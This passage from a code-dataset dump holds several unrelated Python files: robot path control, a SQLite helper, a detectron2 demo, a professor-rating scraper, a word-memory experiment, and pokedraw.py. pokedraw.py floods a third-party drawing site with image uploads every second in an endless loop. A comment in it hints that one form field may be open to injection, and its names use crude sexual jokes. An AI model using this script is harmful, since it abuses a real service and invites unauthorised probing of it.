k[2] > 0:\n kk = \"ltup\"\n # print(kk)\n elif k[0] > 0 and k[3] > 0:\n kk = \"ltdn\"\n # print(kk)\n elif k[1] > 0 and k[2] > 0:\n kk = \"rtup\"\n # print(kk)\n elif k[1] > 0 and k[3] > 0:\n kk = \"rtdn\"\n # print(kk)\n elif k[2] > 0:\n kk = \"up\"\n # print(kk)\n elif k[3] > 0:\n kk = \"dn\"\n\n return kk\n\n\ncdi = []\n\"\"\"\nFunction Name : compass()\nInput: nm-next move\nOutput: corrected direction\nPurpose: this functions take the next move from the stepcount1 function and then decides the direction\n according to the previous move and the alignment of the robot.\n\"\"\"\n\n\ndef compass(nm):\n\n if len(premove) != 0:\n pm = premove[-1]\n if pm == \"up\":\n if nm == \"dn\":\n return \"rt2up\"\n else:\n return nm\n elif pm == \"dn\":\n if nm == \"ltdn\":\n return \"rtup\"\n elif nm == \"rtdn\":\n return \"ltup\"\n elif nm == \"up\":\n return \"rt2up\"\n elif pm == \"ltdn\":\n if nm == \"ltup\":\n return \"rtup\"\n elif nm == \"dn\":\n return \"ltup\"\n elif nm == \"rtup\":\n return \"lt2up\"\n elif pm == \"rtdn\":\n if nm == \"dn\":\n return \"rtup\"\n elif nm == \"rtup\":\n return \"ltup\"\n elif nm == \"ltup\":\n return \"rt2up\"\n elif pm == \"rtup\":\n if nm == \"up\":\n return \"ltup\"\n elif nm == \"rtdn\":\n return \"rtup\"\n elif nm == \"ltdn\":\n return \"rt2up\"\n elif pm == \"ltup\":\n if nm == \"up\":\n return \"rtup\"\n elif nm == \"ltdn\":\n return \"ltup\"\n elif nm == \"rtdn\":\n return \"lt2up\"\n\n else:\n if nm == \"ltdn\":\n return \"ltup\"\n elif nm == \"rtdp\":\n return \"rtup\"\n else:\n\n return nm\n\n\ndii = []\n\"\"\"\nFunction Name : getdirections()\nInput: None\nOutput: None\nPurpose:After getting the finals nodes of the path , we need to get the directions for movement\n of the robot. This function uses the lsit DII containg all the nodes that will come in \n the path and it will generate a list which will contain the movement directions \n according to the areana. It then Uses the function COMPASS to get the directions \n according to the current configuration of the robot and put them in a list CDI. \n\"\"\"\n\n\ndef getdirections():\n for x in range(len(allmoves) - 1):\n dii.append(\n stepcount1(\n allmoves[x][0], allmoves[x][1], allmoves[x + 1][0], allmoves[x + 1][1]\n )\n )\n for y in range(len(dii)):\n cdi.append(compass(dii[y]))\n premove.append(dii[y])\n\n\npebble = []\nwater = []\n\n\"\"\"\nmapp\nwe have assumed the arena to be a X-Y cordinate but we have two starts and hence if the starting position changes \neverything everything will change. we've marked the axes from start 2. if the robot has to start from start 1 this will help it.\n\"\"\"\nmapp = {\n 1: 17,\n 2: 18,\n 3: 12,\n 4: 16,\n 5: 19,\n 6: 13,\n 7: 7,\n 8: 11,\n 9: 15,\n 10: 14,\n 11: 8,\n 12: 3,\n 13: 6,\n 14: 10,\n 15: 9,\n 16: 4,\n 17: 1,\n 18: 2,\n 19: 5,\n}\n\"\"\" \nFunction Name : savepositions1()\nInput: None\nOutput: currentposition- starting position of the bot .\nPurpose: this function extracts the features from the given configuration from E-yantra\n and makes it more accesible by preparing a list of pebbles and water. 
\n that contains the information about the pickup zone and the pitcher zone.\n \n\"\"\"\n\n\ndef savepositions1():\n global allpositions\n for points in start:\n if points[0] == Robot_start:\n ci = points[1][0]\n cj = points[1][1]\n for i in arena_config:\n typ = arena_config[i][0]\n comb = arena_config[i][1]\n pos = arena_config[i][2]\n if ci == 12 and cj == 6:\n comb = mapp[comb]\n for data in dests:\n if data[0] == comb and data[1] == pos:\n cord = data[2]\n if typ == \"Pebble\":\n pebble.append([typ, cord, pos, i, 1])\n elif typ == \"Water Pitcher\":\n water.append([typ, cord, pos, i, 0])\n if ci == 12 and cj == 6:\n ci = 1\n currentposition = [ci, cj]\n\n return currentposition\n\n\n\"\"\"\nFunction Name : finalmove()\nInput: start:- currentposition obtained from the saveposition function.\nOutput: None.\nPurpose: this function send command to the robot using the bhagna function that uses run1() and then the\n robot moves. This does all the pick up managment in proper way. find the nearest pickup zone\n and moves to that from the current location. After putting one pebble into pitcher, it again searches\n for the nearest pebble and then goes there to pickup . Along with the complete movement traversal \n it also does the mad and the rvrt thing along with the buzzer for 5 seconds at last.\n \n\"\"\"\n\n\ndef finalmove(start):\n global pebble\n nearest = 999\n for lab, points in enumerate(pebble):\n if points[-1] > 0:\n if (\n stepcount(start[0], start[1], points[1][1][0], points[1][1][1])[-1]\n < nearest\n and m[points[1][1][0]][points[1][1][1]] != 0\n ):\n nearest = stepcount(\n start[0], start[1], points[1][1][0], points[1][1][1]\n )[-1]\n dest = points[1][1]\n minu = lab\n if (\n stepcount(start[0], start[1], points[1][0][0], points[1][0][1])[-1]\n < nearest\n and m[points[1][0][0]][points[1][0][1]] != 0\n ):\n nearest = stepcount(\n start[0], start[1], points[1][0][0], points[1][0][1]\n )[-1]\n dest = points[1][0]\n minu = lab\n\n print(pebble)\n # time.sleep(1)\n print(start, dest)\n bhagna(start[0], start[1], dest[0], dest[1])\n pebble[minu][-1] -= 1\n ser.write(\"m\".encode())\n mad(pebble[minu][2], premove)\n rvrt(predir)\n\n print(pebble)\n i = 0\n while True:\n if i % 2 == 0:\n curr = dest\n if (\n stepcount(curr[0], curr[1], water[0][1][0][0], water[0][1][0][1])[-1]\n < stepcount(curr[0], curr[1], water[0][1][1][0], water[0][1][1][1])[-1]\n ):\n dest = water[0][1][0]\n else:\n dest = water[0][1][1]\n config = water[0][2]\n bhagna(curr[0], curr[1], dest[0], dest[1])\n water[0][-1] += 1\n print(\"bole\")\n else:\n curr = dest\n nearest = 999\n for lab, points in enumerate(pebble):\n if points[-1] > 0:\n if (\n stepcount(curr[0], curr[1], points[1][1][0], points[1][1][1])[\n -1\n ]\n < nearest\n and m[points[1][1][0]][points[1][1][1]] != 0\n ):\n nearest = stepcount(\n curr[0], curr[1], points[1][1][0], points[1][1][1]\n )[-1]\n dest = points[1][1]\n minu = lab\n if (\n stepcount(curr[0], curr[1], points[1][0][0], points[1][0][1])[\n -1\n ]\n < nearest\n and m[points[1][0][0]][points[1][0][1]] != 0\n ):\n nearest = stepcount(\n curr[0], curr[1], points[1][0][0], points[1][0][1]\n )[-1]\n dest = points[1][0]\n minu = lab\n\n bhagna(curr[0], curr[1], dest[0], dest[1])\n pebble[minu][-1] -= 1\n config = pebble[minu][2]\n # time.sleep(0.5)\n print(curr, dest)\n if i % 2 != 0:\n pass\n ser.write(\"m\".encode())\n mad(config, premove)\n if i % 2 == 0:\n pass\n ser.write(\"o\".encode())\n\n rvrt(predir)\n print(pebble)\n i += 1\n flag = False\n for points in pebble:\n if points[-1] > 
0:\n flag = True\n\n if flag == False and i % 2 != 0:\n break\n time.sleep(1)\n ser.write(\"b\".encode())\n time.sleep(5)\n ser.write(\"n\".encode())\n\n\n\"\"\" \nFunction Name : run1()\nInput: None\nOutput: None\nPurpose: Accordint to the directions in the cdi it sends command to the robot. run1 uses the cdi list \n that is made after calling movethebot() which get the path from move function and directions using\n get direction function. getdirection function uses the function compass to generate a list cdi\n that is being used here to command the robot using ser variable. The delay given in this function is \n due to the reading that are to be obtained from the white line sensor. if we don't keep delay the \n robot will skip that node.\n\"\"\"\n\n\ndef run1():\n for i in range(len(allmoves) - 1):\n if ser.isOpen():\n if cdi[i] == \"ltup\":\n\n ser.write(\"a\".encode())\n # time.sleep(0.25)\n\n while True:\n data = ser.read(1)\n # print(data)\n if data == b\"o\":\n # print(data)\n break\n time.sleep(0.20)\n ser.write(\"w\".encode())\n elif cdi[i] == \"rtup\":\n ser.write(\"d\".encode())\n # time.sleep(0.25)\n # print('rtupsdasdaasd')\n while True:\n data = ser.read(1)\n # print(data)\n if data == b\"o\":\n # print(data)\n break\n time.sleep(0.20)\n ser.write(\"w\".encode())\n # time.sleep(0.55)\n elif cdi[i] == \"lt2up\" or cdi[i] == \"rt2up\":\n ser.write(\"a\".encode())\n # print('hiiio')\n time.sleep(0.25)\n ser.write(\"k\".encode())\n time.sleep(0.25)\n ser.write(\"k\".encode())\n time.sleep(0.25)\n ser.write(\"a\".encode())\n while True:\n data = ser.read(1)\n # print(data)\n if data == b\"o\":\n # print(data)\n break\n time.sleep(0.20)\n ser.write(\"w\".encode())\n time.sleep(0.55)\n elif cdi[i] == \"rt2up\":\n ser.write(\"a\".encode())\n time.sleep(0.25)\n ser.write(\"k\".encode())\n time.sleep(0.25)\n ser.write(\"a\".encode())\n\n while True:\n data = ser.read(1)\n # print(data)\n if data == b\"o\":\n # print(data)\n break\n time.sleep(0.20)\n ser.write(\"w\".encode())\n time.sleep(0.55)\n ser.write(\"j\".encode())\n # print(allmoves[i], allmoves[i+1])\n time.sleep(1)\n\n\n\"\"\"\nFunction Name : clearBuffer()\nInput: None\nOutput: None\nPurpose: this function clears all the global variable after every move except for the premove\n\"\"\"\n\n\ndef clearBuffer():\n global dii, cdi, allmoves\n dii = []\n cdi = []\n # premove=[]\n allmoves = []\n\n\n\"\"\"\nFunction Name : bhagna()\nInput: i-current positions of x axis,j-current position of j axis,k & l- Destination points\nOutput: None\nPurpose: This functions call movethebot and then clearBuffer so this functions can be used directly for\n continious nd nonstop movements. we cannot clear premove once the robot has started , and to keep\n that goal this function is used. \n\"\"\"\n\n\ndef bhagna(i, j, k, l):\n movethebot(i, j, k, l)\n print(\"allmoves\")\n print(allmoves)\n print(\"cdi\")\n print(cdi)\n # print('dii')\n # print(dii)\n clearBuffer()\n\n\n\"\"\"\nFunction Name : mad()---- Move at destination \nInput: axes- the axes mentioned in the polygons , pm= premove\nOutput: None\nPurpose: This functions is used to move the bot for picking up the pebble after reaching the destination\n node with the help of previous move. This functions take two arguments axes and pm. In axes one\n needs to mention the axes to which he want to drop or pick the pebble. In the pm it should be \n given the list of premoves. 
So now it has the list of previous moves and the axes.It will \n then see what sequence of moves it should follow to get to the axes based on the pattern \n of the axes nd the previous moves. Once the moves are done then the id of sequence pattern\n is appended into the predir(this will be used to revert the movements and bring back robot in\n the same position by rvrt function). \n\"\"\"\n\n\ndef mad(axes, pm):\n if axes == \"1-1\":\n if pm[-1] == \"up\" or pm[-1] == \"dn\":\n ser.write(\"f\".encode())\n time.sleep(0.15)\n ser.write(\"j\".encode())\n predir.append(1)\n elif pm[-1] == \"ltup\" or pm[-1] == \"rtdn\":\n ser.write(\"a\".encode())\n time.sleep(0.25)\n ser.write(\"y\".encode())\n time.sleep(0.4)\n ser.write(\"j\".encode())\n time.sleep(0.1)\n ser.write(\"f\".encode())\n time.sleep(0.1)\n ser.write(\"j\".encode())\n predir.append(2)\n elif pm[-1] == \"ltdn\" or pm[-1] == \"rtup\":\n ser.write(\"d\".encode())\n time.sleep(0.25)\n ser.write(\"u\".encode())\n time.sleep(0.4)\n ser.write(\"j\".encode())\n time.sleep(0.1)\n ser.write(\"f\".encode())\n time.sleep(0.1)\n ser.write(\"j\".encode())\n predir.append(3)\n elif axes == \"2-2\":\n if pm[-1] == \"up\" or pm[-1] == \"dn\":\n ser.write(\"a\".encode())\n time.sleep(0.25)\n ser.write(\"y\".encode())\n time.sleep(0.4)\n ser.write(\"j\".encode())\n time.sleep(0.1)\n ser.write(\"f\".encode())\n time.sleep(0.1)\n ser.write(\"j\".encode())\n predir.append(2)\n elif pm[-1] == \"ltup\" or pm[-1] == \"rtdn\":\n ser.write(\"d\".encode())\n time.sleep(0.25)\n ser.write(\"u\".encode())\n time.sleep(0.4)\n ser.write(\"j\".encode())\n time.sleep(0.25)\n ser.write(\"f\".encode())\n time.sleep(0.1)\n ser.write(\"j\".encode())\n predir.append(3)\n elif pm[-1] == \"ltdn\" or pm[-1] == \"rtup\":\n ser.write(\"f\".encode())\n time.sleep(0.15)\n ser.write(\"j\".encode())\n predir.append(1)\n elif axes == \"3-3\":\n if pm[-1] == \"up\" or pm[-1] == \"dn\":\n ser.write(\"d\".encode())\n time.sleep(0.25)\n ser.write(\"u\".encode())\n time.sleep(0.4)\n ser.write(\"j\".encode())\n time.sleep(0.25)\n ser.write(\"f\".encode())\n time.sleep(0.1)\n ser.write(\"j\".encode())\n predir.append(3)\n elif pm[-1] == \"ltup\" or pm[-1] == \"rtdn\":\n ser.write(\"f\".encode())\n time.sleep(0.15)\n ser.write(\"j\".encode())\n predir.append(1)\n elif pm[-1] == \"ltdn\" or pm[-1] == \"rtup\":\n print(\"hiii\")\n ser.write(\"a\".encode())\n time.sleep(0.25)\n ser.write(\"y\".encode())\n time.sleep(0.4)\n ser.write(\"f\".encode())\n time.sleep(0.1)\n ser.write(\"j\".encode())\n predir.append(2)\n ser.write(\"j\".encode())\n time.sleep(1.25)\n\n\n\"\"\"\nFunction Name : rvrt() \nInput: pd=predir\nOutput: None\nPurpose: This functions is used to get the robot back in the position after picking up the pebble. \n basically for alignment. This function takes pd as an argument which is a list of predir.It \n contains the record of the movements done at mad and then it reverses all the movements and then \n the robot comes back to its original position. 
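The id that mad() appended to predir (1, 2 or 3) selects which of those movement sequences is undone here.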
\n\"\"\"\n\n\ndef rvrt(pd):\n    if pd[-1] == 1:\n        ser.write(\"z\".encode())\n        time.sleep(0.15)\n        ser.write(\"j\".encode())\n    if pd[-1] == 2:\n        ser.write(\"z\".encode())\n        time.sleep(0.15)\n        ser.write(\"j\".encode())\n        ser.write(\"d\".encode())\n        time.sleep(0.15)\n        ser.write(\"u\".encode())\n        time.sleep(0.5)\n        ser.write(\"j\".encode())\n    if pd[-1] == 3:\n        ser.write(\"z\".encode())\n        time.sleep(0.15)\n        ser.write(\"j\".encode())\n        ser.write(\"a\".encode())\n        time.sleep(0.15)\n        ser.write(\"y\".encode())\n        time.sleep(0.5)\n        ser.write(\"j\".encode())\n    ser.write(\"j\".encode())\n    time.sleep(1.25)\n","sub_path":"Python Code/bot_move.py","file_name":"bot_move.py","file_ext":"py","file_size_in_byte":31982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"154789539","text":"#!python3\n#encoding:utf-8\nclass Json2Sqlite(object):\n    def __init__(self):\n        pass\n\n    def BoolToInt(self, bool_value):\n#        print('Only bool arguments are valid, but the given argument has type {0} and value {1}.'.format(type(bool_value), bool_value))\n        if not isinstance(bool_value, bool):\n            raise Exception('Only bool arguments are valid, but the given argument has type {0} and value {1}.'.format(type(bool_value), bool_value))\n        if True == bool_value:\n            return 1\n        else:\n            return 0\n    def IntToBool(self, int_value):\n        if not isinstance(int_value, int):\n            raise Exception('Only int arguments are valid, but the given argument has type {0} and value {1}.'.format(type(int_value), int_value))\n        if 0 == int_value:\n            return False\n        else:\n            return True\n\n    def ArrayToString(self, array):\n        if not isinstance(array, list):\n            raise Exception('Only list arguments are valid, but the given argument has type {0} and value {1}.'.format(type(array), array))\n        if None is array or 0 == len(array):\n            return None\n        ret = \"\"\n        for v in array:\n            ret += str(v) + ','\n#            ret += v + ','\n#        print(ret)\n#        print(ret[:-1])\n        return ret[:-1]\n    def StringToArray(self, string):\n        if not isinstance(string, str):\n            raise Exception('Only str arguments are valid, but the given argument has type {0} and value {1}.'.format(type(string), string))\n        if None is string or 0 == len(string):\n            return None\n        array = []\n        for item in string.split(','):\n#        for item in string.sprit(','):\n#            if 0 < len(item):\n            if 0 < len(item.strip()):\n                array.append(item)\n        return array\n","sub_path":"web/sqlite/Json2Sqlite.py","file_name":"Json2Sqlite.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"234328817","text":"import atexit\nimport bisect\nimport multiprocessing as mp\nfrom collections import deque\nimport cv2\nimport torch\nimport argparse\nimport glob\nimport os\n\nfrom detectron2.data import MetadataCatalog\nfrom detectron2.engine.defaults import DefaultPredictor\nfrom detectron2.utils.video_visualizer import VideoVisualizer\nfrom detectron2.utils.visualizer import ColorMode, Visualizer\nfrom detectron2.config import get_cfg\nfrom detectron2.data.detection_utils import read_image\nfrom detectron2.utils.logger import setup_logger\n\ndef setup_cfg(args):\n    # load config from file and command-line arguments\n    cfg = get_cfg()\n    cfg.merge_from_file(args.config_file)\n    cfg.merge_from_list(args.opts)\n    # Set score_threshold for builtin models\n    cfg.MODEL.RETINANET.SCORE_THRESH_TEST = args.confidence_threshold\n    cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = args.confidence_threshold\n    cfg.MODEL.PANOPTIC_FPN.COMBINE.INSTANCES_CONFIDENCE_THRESH = args.confidence_threshold\n    cfg.freeze()\n    return cfg\ndef get_parser():\n    parser = argparse.ArgumentParser(description=\"Detectron2 demo for builtin models\")\n    
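# Illustrative invocation (the paths here are placeholders, not from the repo):\n    #   python pan_vis.py --config-file some_cfg.yaml --input image_dir/ --output out_dir/\n    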
parser.add_argument(\n \"--config-file\",\n default=\"configs/quick_schedules/mask_rcnn_R_50_FPN_inference_acc_test.yaml\",\n metavar=\"FILE\",\n help=\"path to config file\",\n )\n parser.add_argument(\n \"--output\",\n help=\"A file or directory to save output visualizations. \"\n \"If not given, will show output in an OpenCV window.\",\n )\n parser.add_argument(\n \"--input\",\n help=\"A file or directory to save output visualizations. \"\n \"If not given, will show output in an OpenCV window.\",\n )\n\n parser.add_argument(\n \"--confidence-threshold\",\n type=float,\n default=0.5,\n help=\"Minimum score for instance predictions to be shown\",\n )\n parser.add_argument(\n \"--opts\",\n help=\"Modify config options using the command-line 'KEY VALUE' pairs\",\n default=[],\n nargs=argparse.REMAINDER,\n )\n return parser\n\n\nclass VisualizationDemo(object):\n def __init__(self, cfg, instance_mode=ColorMode.IMAGE, parallel=False):\n \"\"\"\n Args:\n cfg (CfgNode):\n instance_mode (ColorMode):\n parallel (bool): whether to run the model in different processes from visualization.\n Useful since the visualization logic can be slow.\n \"\"\"\n self.metadata = MetadataCatalog.get(\n cfg.DATASETS.TEST[0] if len(cfg.DATASETS.TEST) else \"__unused\"\n )\n self.cpu_device = torch.device(\"cpu\")\n self.instance_mode = instance_mode\n\n self.parallel = parallel\n self.predictor = DefaultPredictor(cfg)\n\n def run_on_image(self, image):\n \"\"\"\n Args:\n image (np.ndarray): an image of shape (H, W, C) (in BGR order).\n This is the format used by OpenCV.\n Returns:\n predictions (dict): the output of the model.\n vis_output (VisImage): the visualized image output.\n \"\"\"\n vis_output = None\n predictions = self.predictor(image)\n # Convert image from OpenCV BGR format to Matplotlib RGB format.\n image = image[:, :, ::-1]\n visualizer = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n visualizer_sem = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n visualizer_ins = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n if \"panoptic_seg\" in predictions:\n panoptic_seg, segments_info = predictions[\"panoptic_seg\"]\n vis_output = visualizer.draw_panoptic_seg_predictions(\n panoptic_seg.to(self.cpu_device), segments_info\n )\n vis_output_sem = visualizer_sem.draw_pan_sem_predictions(\n panoptic_seg.to(self.cpu_device), segments_info\n )\n vis_output_ins= visualizer_ins.draw_pan_ins_predictions(\n panoptic_seg.to(self.cpu_device), segments_info\n )\n return vis_output, vis_output_sem, vis_output_ins\n \nif __name__ == \"__main__\": \n args = get_parser().parse_args()\n setup_logger(name=\"fvcore\")\n logger = setup_logger()\n logger.info(\"Arguments: \" + str(args))\n\n cfg = setup_cfg(args)\n\n demo = VisualizationDemo(cfg)\n img_path = args.input # path to image\n img_list = os.listdir(img_path)\n save_path = args.output\n for im in img_list:\n img = read_image(os.path.join(img_path,im), format=\"BGR\")\n pan, sem, ins = demo.run_on_image(img)\n pan.save(os.path.join(save_path,'{}_pan.png'.format(im[:-4])))\n sem.save(os.path.join(save_path,'{}_sem.png'.format(im[:-4])))\n ins.save(os.path.join(save_path,'{}_ins.png'.format(im[:-4])))\n","sub_path":"demo/pan_vis.py","file_name":"pan_vis.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"366513351","text":"# this script is for scraping ALL OSU and PSU statistics teacher ratings\n# (not just overall 
average)\n# note: you have to close the cookies pop-up yourself each time a new teacher page is loaded\nimport pandas as pd\nimport requests\nimport re\nimport time\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\ndef get_all_ratings(prof_id):\n # this function gets all the overall ratings for a teacher and outputs a dataframe\n # for >20 ratings\n if all_profs[all_profs.id == prof_id].tNumRatings.iloc[0] > 20:\n #use selenium to access page\n page = 'https://www.ratemyprofessors.com/ShowRatings.jsp?tid=' + str(prof_id)\n driver = webdriver.Firefox(executable_path = '/usr/local/bin/geckodriver')\n driver.get(page)\n \n # load more ratings\n while True:\n try:\n loadMoreButton = driver.find_element_by_id('loadMore')\n time.sleep(2)\n loadMoreButton.click()\n time.sleep(5)\n except Exception as e:\n print(e)\n break\n print(f'ID {prof_id} Complete')\n time.sleep(2)\n page_source = driver.page_source\n driver.close()\n # for <20 ratings\n else:\n page = requests.get('https://www.ratemyprofessors.com/ShowRatings.jsp?tid=' + str(prof_id))\n page_source = page.content\n \n # parse/extract results\n soup = BeautifulSoup(page_source, 'html.parser')\n ratings_raw = soup.find_all('span', attrs = {'class' : re.compile('^score (?!.*inverse).*')})\n ratings = [re.findall(r'[1-5]', str(line)) for line in ratings_raw]\n ratings = [num[0] for num in ratings]\n \n return pd.DataFrame({'tid': prof_id, 'ratings': ratings})\n\ndef create_ratings_df(list_of_ids):\n # this function gets all the overall ratings for all teachers and outputs a dataframe\n dfs = [get_all_ratings(num) for num in list_of_ids]\n return pd.concat(dfs)\n\n# create df, write out to csv\nall_ratings = create_ratings_df(all_profs.id)\nall_ratings.to_csv('/Users/msieviec/Python/osu v psu/all_ratings.csv', index = False)","sub_path":"get_teacher_ratings.py","file_name":"get_teacher_ratings.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"477237919","text":"#!/usr/bin/python\nimport itertools as it, glob\nfrom time import sleep\nimport requests\nimport base64\nimport re\n\nass = requests.session() #hehe ass\nbutts = ('*.jpg','*.png','*.jpeg') #hehe butts\n\ndef lolis(*patterns): #Makes it easier to list files in current directory also hehe lolis\n return it.chain.from_iterable(glob.glob(pattern) for pattern in patterns) \n\ndef suck(image): #hehe suck\n try:\n response = ass.post(\n url=\"http://www.pokedraw.net/ajax/saveImage\",\n data={\"pokemon\":\"
Smug anime girl
\", # We can set our own Pokemon name. hint hint might be vuln to something\n \"browser\":\"I DONT USE A BROWSER\", # What browser we use\n \"browser_version\":\"69\", # What version is the browser?\n \"imgBase64\":base64.encodestring(open(image, \"rb\").read()) #Converts image to base64 string.\n })\n except Exception as e:\n print(\"Error uploading {0}\".format(e))\n exit()\n else:\n print(response.text)\n\nif __name__ == '__main__':\n while True: \n sleep(1)\n for dicks in lolis('*.jpg','*.png','*.jpeg') :#hehe\n suck(dicks) #hehhhh\n","sub_path":"pokedraw.py","file_name":"pokedraw.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"633400919","text":"## This file contains the class PresentWords, as used in the main timed word presenter program.\n## Word is its own class (instead of a list of strings) to allow for easy modifications \n\n## Written By: Michael Carter, Oct./Nov. 2019\n## For my PSYCO 403/505 research project\n\n\nfrom numpy import random\nimport pygame as pg\nfrom pygame.locals import *\n\nfrom uagame import Window\nfrom word import Word\nimport time\nfrom results import ResultsFile\n\n\n## TEST PARAMETERS ##\nWORDS_FILENAME = 'testwords.txt'\nWINDOW_SIZE = (700, 500)\nDEFAULT_FONT_COLOR = \"gray\"\nDEFAULT_FONT_SIZE = 36\nDEFAULT_FONT_NAME = \"Arial\"\nBG_COLOR = \"gray50\"\n\n\nclass PresentWords:\n \"\"\"\n This class includes everything required for a single word presentation task.\n word_list is a list of objects of class Word.\n \"\"\"\n @classmethod\n def set_word_lib(cls, word_lib):\n cls.word_lib = word_lib \n @classmethod\n def set_window(cls, window_from_parent):\n cls.window = window_from_parent\n @classmethod\n def set_results_file(cls, results_file):\n cls.results = results_file\n\n def __init__(self, num_words, present_time, delay_time, is_colored=False):\n self.__is_colored = is_colored\n self.__present_time = present_time\n self.__delay_time = delay_time\n self.__num_words = num_words\n \n self.__word_list = []\n self.__quit = False\n self.__space_pressed = False\n \n self.__clock = pg.time.Clock()\n self.__timer_wd = DisplayTimer()\n self.__timer_bl = DisplayTimer()\n\n self.generate_rand_word_list()\n self.__window = PresentWords.window\n \n self.__write_to_results() \n self.run()\n\n def run(self):\n # runs the presenter for one word list\n self.__initialize_window()\n self.__display_instructions() \n self.__display_countdown()\n \n self.__timer_bl.reset()\n self.__timer_wd.reset()\n \n for word in self.__word_list: \n next = False\n while not self.__quit and not next:\n self.__check_events()\n next = self.__display_next(word)\n self.__window.update()\n self.__clock.tick(30)\n\n def __initialize_window(self):\n # sets all the window's parameters to the ones relevant to the class.\n self.__clock.tick(30)\n self.__window.set_bg_color(BG_COLOR)\n self.__window.set_font_color(DEFAULT_FONT_COLOR)\n self.__window.clear()\n self.__window.update()\n \n def __write_to_results(self):\n # writes the info to the header of the results file\n PresentWords.results.new_trial_header(self.__word_list, \n self.__present_time, \n self.__delay_time, \n self.__is_colored)\n \n def __check_events(self): \n # handle user inputs\n for event in pg.event.get():\n if event.type == QUIT:\n self.__handle_quit()\n \n if event.type == KEYUP:\n if event.key == pg.K_SPACE:\n self.__space_pressed = True\n else: \n self.__space_pressed = False # \"flip the switch\" back\n\n def 
__handle_quit(self):\n self.__quit = True\n \n #self.__window.close()\n \n def generate_rand_word_list(self):\n # Generates the word_list by randomly picking num_words from word_lib.\n try:\n for i in range(self.__num_words):\n r = random.randint(0, len(PresentWords.word_lib))\n self.__word_list.append(PresentWords.word_lib.pop(r))\n #self.__word_list.append(random.choice(PresentWords.word_lib, replace=False)) \n except ValueError:\n print(\"Value Error: Insufficient words given\") \n \n def __display_next(self,word):\n # displays the next word for present_time, followed by a blank screen for delay_time \n if not self.__timer_wd.been_longer_than(self.__present_time):\n self.__display_word(word)\n self.__timer_bl.reset()\n else:\n self.__display_blank() \n if self.__timer_bl.been_longer_than(self.__delay_time):\n self.__timer_wd.reset()\n return True\n return False\n\n def __display_blank(self):\n self.__window.clear()\n\n def __display_word(self,word):\n word.set_window(self.__window)\n word.draw_word(self.__is_colored)\n \n def __display_instructions(self):\n # Draws each line of each page to the display. \n # Pages are advanced by a spacebar press.\n self.__window.set_font_color(DEFAULT_FONT_COLOR)\n self.__window.set_font_size(DEFAULT_FONT_SIZE)\n print(\"Displaying Presentation Instructions\")\n \n instructions = [ \n # Page 1\n [\"This is a test of word memory.\", \" \", \n \"%d concrete nouns will be presented\" % (self.__num_words), \n \"for %d second(s) at a time,\" % (self.__present_time),\n \"with %d second(s) in between.\" % (self.__delay_time),\n \" \", \"Press Space to Continue\"],\n # Page 2\n [\"Afterwards, you will be prompted\",\n \"to recall the words in order.\", \n \" \", \"Press Space to Continue\"],\n # Page 3\n [\"Press Space to Start\"] ]\n \n for i, page in enumerate(instructions):\n self.__space_pressed = False\n while not self.__space_pressed:\n # draw the page counter\n counter = \"%d/%d\" % (i+1, len(instructions))\n self.__window.draw_string(counter, \n self.__window.get_width() - self.__window.get_string_width(counter),\n self.__window.get_height() - self.__window.get_font_height())\n # draw each line\n for j, line in enumerate(page):\n x, y = self.__find_string_x_y(line, j, len(page))\n self.__window.draw_string(line, x, y)\n \n self.__check_events() \n self.__window.clear() \n\n def __display_countdown(self):\n # currently just uses the time.sleep() method for the delay, \n # since it's not that big of a deal.\n countdown = [\"3...\",\"2...\",\"1...\"]\n for count_str in countdown:\n x,y = self.__find_string_x_y(count_str, 0)\n self.__window.draw_string(count_str, x, y)\n time.sleep(1)\n self.__window.clear()\n\n def __find_string_x_y(self, print_string, line_no, total_lines=1):\n # returns a tuple of the (x,y) position to draw the string at.\n x = (self.__window.get_width() - self.__window.get_string_width(print_string)) // 2\n y = ((self.__window.get_height() - (self.__window.get_font_height() * total_lines+1)) // 2) + (self.__window.get_font_height() * line_no)\n return (x,y)\n \nclass DisplayTimer:\n \"\"\" \n This class allows the events to be timed,\n to make decisions as to whether or not to progress.\n \"\"\" \n def __init__(self):\n self.__time_init = time.time() # current time in fractional seconds\n\n def reset(self):\n self.__time_init = time.time()\n\n def been_longer_than(self, check_seconds):\n # returns true if the timer has exceeded the check time.\n time_now = time.time()\n if self.__time_init < (time_now - check_seconds):\n return True\n 
else:\n return False \n\ndef main():\n \"\"\"Tests the Methods\"\"\"\n \n window = create_window()\n \n word_library = read_words_file(WORDS_FILENAME)\n PresentWords.set_word_lib(word_library) \n PresentWords.set_window(window) \n \n results_file = ResultsFile() \n PresentWords.set_results_file(results_file)\n \n # Present Words\n #test_1 = PresentWords(4, 5, 2, False) # (num_words, present_time, delay_time, is_colored (bool))\n test_2 = PresentWords(5, 3, 1, True) \n \ndef create_window():\n # Create a window for the game and open it.\n window = Window(\"Word Presenter\", WINDOW_SIZE[0], WINDOW_SIZE[1])\n window.set_bg_color(BG_COLOR)\n window.set_font_color(DEFAULT_FONT_COLOR)\n window.set_font_size(DEFAULT_FONT_SIZE)\n window.set_font_name(DEFAULT_FONT_NAME)\n window.clear()\n window.update()\n \n return window \n \n \ndef read_words_file(filename):\n # Read in the list of possible words.\n # Returns a list of objects of the Word class.\n word_list = []\n try:\t\t\n with open(filename,'r') as file:\n for input_word in file.readlines():\n word_list.append(Word(input_word.strip('\\n\\r')))\n assert len(word_list) > 0, \"word list cannot be empty\"\n except FileNotFoundError as e:\n print('Error: File not found! %s' % (e.strerror))\n return\n else:\t\t\n return word_list\n \n\nif __name__ == \"__main__\":\n main()\n 